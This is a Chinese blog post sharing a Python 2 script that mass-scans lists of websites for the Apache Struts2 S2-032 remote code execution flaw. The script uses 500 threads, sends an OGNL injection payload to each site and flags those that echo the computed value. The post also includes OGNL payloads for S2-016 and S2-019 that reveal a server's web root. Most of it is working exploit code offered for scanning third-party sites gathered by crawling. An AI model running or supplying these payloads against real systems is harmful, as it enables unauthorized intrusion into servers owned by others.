s2-032批量脚本

看乌云上许多大牛上脚本，我也写个玩吧！写的比较简单。懒得优化，参数获取就自己改吧

需要抓很多struts，可用爱站工具包或则自己写个脚本爬

 

 

#coding:utf8
import urllib2
import re
import urlparse
import Queue
import threading
import mechanize
import cookielib


queue = Queue.Queue()
mutex = threading.Lock()


def find_title(url):
        try:
            br = mechanize.Browser()
            br.set_cookiejar(cookielib.LWPCookieJar()) # Cookie jar
            br.set_handle_equiv(True) # Browser Option
            br.set_handle_redirect(True)
            br.set_handle_referer(True)
            br.set_handle_robots(False)
            br.set_handle_refresh(mechanize._http.HTTPRefreshProcessor(), max_time=1)
            br.addheaders = [('User-agent', 'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.1) Gecko/2008071615 Fedora/3.0.1-1.fc9 Firefox/3.0.1')]
            br.open(url)
            t = br.title().decode('utf-8').encode('gb2312')
            return t
        except Exception,e:
                return ''


def s2_status():
    global number
    while True:
        if queue.empty():
            break
        
        url = queue.get()
        data = "method:%23_memberAccess%3D%40ognl.OgnlContext%40DEFAULT_MEMBER_ACCESS%2C%23matt%3D%23attr.get(%23parameters.command%5B0%5D)%2C%23matt.getWriter().println(3345*2356)%2C%23matt.getWriter().flush()%2C%23matt.getWriter().close()%2C1%3F%23xx%3A%23request.toString&command=com.opensymphony.xwork2.dispatcher.HttpServletResponse"
        html,status = url_open(url,data)
        if status == '200' and re.search(r'7880820',html):
            mutex.acquire()
            print url+"     "+find_title(url)+"   s2-032  "+str(number)
            mutex.release()
        number = number + 1
                
        #else:
            #print "no"
    

def url_open(url,data):
    headers={
        "User-Agent": "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.57 Safari/537.36"
                    #"Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
                    #"Accept-Language": "zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3",
                    #"Accept-Encoding": "gzip, deflate",
                    #"If-Modified-Since": "Tue, 03 Dec 2010 08:25:11 GMT",
                    #"Cache-Control": "max-age=0"
        }
    try:
        req = urllib2.Request(url,data,headers = headers)
        html = urllib2.urlopen(req,timeout=3).read()
        ret = '200'
        return html,ret
    except urllib2.HTTPError, e:
        return '',e.code
    except:
        return '','99999'   

#------------------------------------------------------------
if __name__ == "__main__":
    global number
    number = 1
    with open('action.txt','r') as f:
        url = f.readline()
        while url:
            queue.put(str(url))
            url = f.readline()
        print queue.qsize()
                

    threads = []
    for i in range(500):
        t = threading.Thread(target=s2_status)
        t.start()
        threads.append(t)

    for t in threads:
        t.join()

    print 'All Done!'

 

 

 

简单去重，由于数量少，就没考虑溢出

import re

with open('1.txt','r') as f:
    txt = f.read()
    #print txt

url = re.findall(r'(http://.*?)\|',txt)
url = set(url)
for i in url:
    with open('result.txt','a+') as f:
        f.write(i.strip()+"\n")

效果图

 

16，19poc

data_32 = "method:%23_memberAccess%3D%40ognl.OgnlContext%40DEFAULT_MEMBER_ACCESS%2C%23matt%3D%23attr.get(%23parameters.command%5B0%5D)%2C%23matt.getWriter().println(7880820)%2C%23matt.getWriter().flush()%2C%23matt.getWriter().close()%2C1%3F%23xx%3A%23request.toString&command=com.opensymphony.xwork2.dispatcher.HttpServletResponse"
    data_16 = "redirect:${%23req%3d%23context.get(%27co%27%2b%27m.open%27%2b%27symphony.xwo%27%2b%27rk2.disp%27%2b%27atcher.HttpSer%27%2b%27vletReq%27%2b%27uest%27),%23resp%3d%23context.get(%27co%27%2b%27m.open%27%2b%27symphony.xwo%27%2b%27rk2.disp%27%2b%27atcher.HttpSer%27%2b%27vletRes%27%2b%27ponse%27),%23resp.setCharacterEncoding(%27UTF-8%27),%23resp.getWriter().print(%22web%22),%23resp.getWriter().print(%22path7880820:%22),%23resp.getWriter().print(%23req.getSession().getServletContext().getRealPath(%22/%22)),%23resp.getWriter().flush(),%23resp.getWriter().close()}"
    data_19 = "debug=command&expression=%23req%3d%23context.get(%27co%27%2b%27m.open%27%2b%27symphony.xwo%27%2b%27rk2.disp%27%2b%27atcher.HttpSer%27%2b%27vletReq%27%2b%27uest%27),%23resp%3d%23context.get(%27co%27%2b%27m.open%27%2b%27symphony.xwo%27%2b%27rk2.disp%27%2b%27atcher.HttpSer%27%2b%27vletRes%27%2b%27ponse%27),%23resp.setCharacterEncoding(%27UTF-8%27),%23resp.getWriter().print(%22web%22),%23resp.getWriter().print(%22path7880820:%22),%23resp.getWriter().print(%23req.getSession().getServletContext().getRealPath(%22/%22)),%23resp.getWriter().flush(),%23resp.getWriter().close()"